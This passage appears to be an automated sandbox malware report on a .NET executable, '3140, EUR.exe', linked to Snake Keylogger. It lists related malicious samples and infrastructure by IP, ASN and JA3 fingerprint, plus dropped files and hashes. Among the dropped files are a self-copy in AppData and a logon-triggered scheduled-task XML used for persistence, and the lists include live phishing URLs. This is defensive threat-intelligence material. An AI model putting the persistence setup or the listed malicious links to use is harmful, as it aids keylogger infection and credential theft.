	SecuriteInfo.com.Trojan.PackedNET.3066.19627.4428.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	58ADE05412907F657812BDA267C43288EA79418091.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	New Order.doc	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	0225139776.docx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	new shipment.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	SecuriteInfo.com.Trojan.AutoIt.1503.25057.26595.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	update SOA.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	149.154.167.99
	1727684587d91a3fc4a77823bfb5c4c41b9d6c0bff84ae126bd19290c7e03bed994fdb4477364.dat-decoded.exe	Get hash	malicious	CryptOne, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	149.154.167.99
	http://www.telegram-korea.com/	Get hash	malicious	Unknown	Browse	149.154.167.99
	http://www.35yc29h.xyz/	Get hash	malicious	Unknown	Browse	149.154.167.99
CLOUDFLARENETUS	factura proforma .docx.doc	Get hash	malicious	Remcos	Browse	172.67.216.244
	http://email.app.loyalty.appstle.com/c/eJwczE2uLBEUAODVMHty6vgfGLxJ7YNCldsaadKJ3d_kbuCLDpJVWtPkDo1aHlqApo_j-QrGx0NGE5VRkkMwCbUEaa334GlxCCjAogErldDsyjIGyVXM-UCInAjwY7Dat69rMz_GXDWxq79pdc9aYxL-n-BJ8KylvUpjoXSC5_2T2iwlljsRPOnHhc--S1VIBHzvyVp-sdbpchGMyvkfJvbe8-mj5P2nfx3-BgAA__-UbkEq	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://www.google.com.ai/amp/clck.ru/3DSSCz?hghghghHGVGvbbgffGFHGJdgddghfhghfgdgdgdgfhgg?sdfsewsrewrettfg	Get hash	malicious	GRQ Scam	Browse	104.21.27.6
	https://techservealliance.org	Get hash	malicious	Unknown	Browse	104.18.142.119
	SCAN_Client_No_XP9739270128398468932393.pdf	Get hash	malicious	HTMLPhisher	Browse	104.21.90.191
	https://cganet.com/	Get hash	malicious	Unknown	Browse	104.22.0.204
	https://ck.storematch.jp/bc?d=11044D9580EY4W1C2FD019VB3VD27BCW862C0351F9E0EA8-cdlaq4&B=a4f71fd1c235a114f94297e8a0a36c6e&sc_i=shp_pc_promo_mdRMBP_disp_mcad&rd=//interglobalcargoexpress.com/yuuuii#aW5mb0B2b3NzbG9oLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.1.169
	file.exe	Get hash	malicious	LummaC	Browse	172.67.129.166
	https://www.curiosolucky.com/dos/#XaXBlcmFsdGFAc2FuaXRhcy5lcw==	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
UTMEMUS	1727684587d91a3fc4a77823bfb5c4c41b9d6c0bff84ae126bd19290c7e03bed994fdb4477364.dat-decoded.exe	Get hash	malicious	CryptOne, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	SYSN ORDER.xls	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	58ADE05412907F657812BDA267C43288EA79418091.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	New Order.doc	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	0225139776.docx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	new shipment.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	update SOA.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	GfGxum1sf3.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	GEsD6lobvy.hta	Get hash	malicious	Cobalt Strike, Snake Keylogger	Browse	132.226.8.169
	Payment Advice.xls	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
EKSENBILISIMTR	Ziraat Bankas#U0131 Swift Mesaj#U0131_Report9278837374.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	45.143.99.52
	Swift E-Posta Bildirimi_2024-09-23_T11511900.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	45.143.99.52
	04cde81ac938706771fa9fe936ee8f79fe7e079973098.exe	Get hash	malicious	RedLine, Xmrig	Browse	45.133.36.107
	fKQg0x6bbi.elf	Get hash	malicious	Mirai	Browse	185.154.193.242
	wwa0n141m0.elf	Get hash	malicious	Mirai	Browse	185.154.193.242
	HhTAZl7a4Y.elf	Get hash	malicious	Mirai	Browse	185.154.193.242
	C5zetLDDZz.elf	Get hash	malicious	Mirai	Browse	185.154.193.242
	boatnet.arm.elf	Get hash	malicious	Mirai	Browse	185.154.193.242
	boatnet.x86.elf	Get hash	malicious	Mirai	Browse	185.154.193.242
	https://acrobat.adobe.com/id/urn:aaid:sc:EU:98ca4a25-984a-4511-9eb1-b7e6c5c56a12	Get hash	malicious	HTMLPhisher	Browse	45.143.99.52

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	Italya301 Kurumlu projesi_SLG620-50mm%0190%_ img .exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	1727684587d91a3fc4a77823bfb5c4c41b9d6c0bff84ae126bd19290c7e03bed994fdb4477364.dat-decoded.exe	Get hash	malicious	CryptOne, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	SecuriteInfo.com.Trojan.PackedNET.3066.19627.4428.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	uvDYInLodR.exe	Get hash	malicious	Njrat	Browse	188.114.97.3
	uvDYInLodR.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	3nWKbZrQvF.exe	Get hash	malicious	Njrat	Browse	188.114.97.3
	3nWKbZrQvF.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	SecuriteInfo.com.Trojan.AutoIt.1503.25057.26595.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	update SOA.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	.05.2024.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
3b5074b1b5d032e5620f69f9f700ff0e	UhkzPftQIt.exe	Get hash	malicious	ScreenConnect Tool	Browse	149.154.167.220
	7LC2izrr9u.exe	Get hash	malicious	ScreenConnect Tool	Browse	149.154.167.220
	UhkzPftQIt.exe	Get hash	malicious	ScreenConnect Tool	Browse	149.154.167.220
	mrKs8EKXbz.exe	Get hash	malicious	ScreenConnect Tool	Browse	149.154.167.220
	7LC2izrr9u.exe	Get hash	malicious	ScreenConnect Tool	Browse	149.154.167.220
	https://metrics.send.hotmart.com/v2/events/click/64ec6af4-7b81-4abf-9e97-fe7d70d45255?d=1nFwG70sgZqlXE	Get hash	malicious	Unknown	Browse	149.154.167.220
	Shipping documents 000029393994400000000000.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	file.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	1727684587d91a3fc4a77823bfb5c4c41b9d6c0bff84ae126bd19290c7e03bed994fdb4477364.dat-decoded.exe	Get hash	malicious	CryptOne, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Bnnebgers.vbs	Get hash	malicious	GuLoader, Lokibot	Browse	149.154.167.220

Process:	C:\Users\user\Desktop\3140, EUR.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1968
Entropy (8bit):	5.345338934370444
Encrypted:	false
SSDEEP:	48:MxHKlYHKh3ouHgJHreylEHMHKo/tHo6hAHKzeRHKx1qHxvj:iqlYqh3ou0aymsqwtI6eqzqqxwRb
MD5:	A6AE821E85EB04F10E67C9D65E129C47
SHA1:	8B3295F40A2F7DCA294DE5502CFE6A751239DB2C
SHA-256:	BD5DE47C737626F6A162CDFE9476DE310476B56FAF917092DF2D9CD4059A6A41
SHA-512:	22E2404E8D989DC1F58B209B48A2BD0AFFA0E19B09100C3FD8417A8A23EBA109A36AF7031CAE33F8FF5BD798F01F81ACA129D90801B34A9607C2D62A63C643DD
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\4d760e3e4675c4a4c66b64205fb0d001\WindowsBase.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\17470ef0c7a174f38bdcadacc3e310ad\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\lkuPOyvaWlIu.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1968
Entropy (8bit):	5.345338934370444
Encrypted:	false
SSDEEP:	48:MxHKlYHKh3ouHgJHreylEHMHKo/tHo6hAHKzeRHKx1qHxvj:iqlYqh3ou0aymsqwtI6eqzqqxwRb
MD5:	A6AE821E85EB04F10E67C9D65E129C47
SHA1:	8B3295F40A2F7DCA294DE5502CFE6A751239DB2C
SHA-256:	BD5DE47C737626F6A162CDFE9476DE310476B56FAF917092DF2D9CD4059A6A41
SHA-512:	22E2404E8D989DC1F58B209B48A2BD0AFFA0E19B09100C3FD8417A8A23EBA109A36AF7031CAE33F8FF5BD798F01F81ACA129D90801B34A9607C2D62A63C643DD
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\4d760e3e4675c4a4c66b64205fb0d001\WindowsBase.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\17470ef0c7a174f38bdcadacc3e310ad\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	2232
Entropy (8bit):	5.379401388151058
Encrypted:	false
SSDEEP:	48:fWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//ZSUyus:fLHxvIIwLgZ2KRHWLOugEs
MD5:	E1EE0479D96955B1FB2CC31056370383
SHA1:	34786077993793FCB28FA325740270F5F7F8723E
SHA-256:	20C37B9D9110033848F4AB81E3A860C2B56E1DBBFFB2F361B2FBE9D47F91F967
SHA-512:	91C99CA6000309B28FB7776512B6418F11EDDEC960DDC11FB05B758CD589D1BF1EE1E09C8C5648062F8D750FA211BF115CADF873FAFB810296AC480E60790C54
Malicious:	false
Preview:	@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_21y1z2oz.3h0.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hpwuiogt.yij.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i0yqbczp.qe4.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mswb0zbg.qqo.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n004ova5.pic.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q2vtgbrs.lki.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sh1a2noa.sdj.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u4ps0e4k.ji4.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp4A2.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1578
Entropy (8bit):	5.108563392413422
Encrypted:	false
SSDEEP:	24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaXJxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTm/v
MD5:	16EE647A4560DF7E07ADA024D87818D9
SHA1:	B8D20DA70237AE65D631BEA7BF8D65F0C307CF70
SHA-256:	4D30B755ADDADF9588CE3BE88B453E5AE924881BAA5821B21755E6CA231E36A8
SHA-512:	41E06360353BFECA9B0460B0950EFF7FB12B5FADAF793FCBE25108B9DE138395A5527DB04AA0464DBDD2761CB2CE7E1BED0D780307C4AB2963485C8F3971951C
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Local\Temp\tmpE737.tmp

Download File

Process:	C:\Users\user\Desktop\3140, EUR.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1578
Entropy (8bit):	5.108563392413422
Encrypted:	false
SSDEEP:	24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaXJxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTm/v
MD5:	16EE647A4560DF7E07ADA024D87818D9
SHA1:	B8D20DA70237AE65D631BEA7BF8D65F0C307CF70
SHA-256:	4D30B755ADDADF9588CE3BE88B453E5AE924881BAA5821B21755E6CA231E36A8
SHA-512:	41E06360353BFECA9B0460B0950EFF7FB12B5FADAF793FCBE25108B9DE138395A5527DB04AA0464DBDD2761CB2CE7E1BED0D780307C4AB2963485C8F3971951C
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe

Download File

Process:	C:\Users\user\Desktop\3140, EUR.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	815104
Entropy (8bit):	7.756202783919322
Encrypted:	false
SSDEEP:	12288:UUxLU3TBHWn/JDfaWEtYWWcw/1/4sln7aIK5nRYji9avo0Dx/v7UcM:UUxCHwDiWEepcw/ia7aV6jMG/HYcM
MD5:	332593AE1E0BA5A06370963C37BBBCEB
SHA1:	994F8E733BA1961882DCDEF0C78FC305DB4C1C91
SHA-256:	9CA5A71321522F47140B36E5F1983CFF7455DD124CAA231D97DF29CD654C6893
SHA-512:	111B6D04597E4F00D8D30CB3E1C8514B92FC1AD936DB7553A6F9F00146E0511BEDB4D0FCD2CB011959063FFA6EAC88A8287724ADE1E67A1AA77122390C7E48C0
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 47% Antivirus: Virustotal, Detection: 44%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............0..8...0.......S... ...`....@.. ....................................@.................................kS..O....`...$..........................8?..T............................................ ............... ..H............text....3... ...8.................. ..`.rsrc....$...`...(...@..............@..@.reloc...............h..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\3140, EUR.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.756202783919322
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01%
File name:	3140, EUR.exe
File size:	815'104 bytes
MD5:	332593ae1e0ba5a06370963c37bbbceb
SHA1:	994f8e733ba1961882dcdef0c78fc305db4c1c91
SHA256:	9ca5a71321522f47140b36e5f1983cff7455dd124caa231d97df29cd654c6893
SHA512:	111b6d04597e4f00d8d30cb3e1c8514b92fc1ad936db7553a6f9f00146e0511bedb4d0fcd2cb011959063ffa6eac88a8287724ade1e67a1aa77122390c7e48c0
SSDEEP:	12288:UUxLU3TBHWn/JDfaWEtYWWcw/1/4sln7aIK5nRYji9avo0Dx/v7UcM:UUxCHwDiWEepcw/ia7aV6jMG/HYcM
TLSH:	9505F1D03B26B71ACE791934D639DDB592B81E68B0507AF769DC3B4B769C201AE0CF01
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............0..8...0.......S... ...`....@.. ....................................@................................

File Icon


Icon Hash:	07232160d4603107

Static PE Info

General

Entrypoint:	0x4c53be
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66FA1415 [Mon Sep 30 02:59:33 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
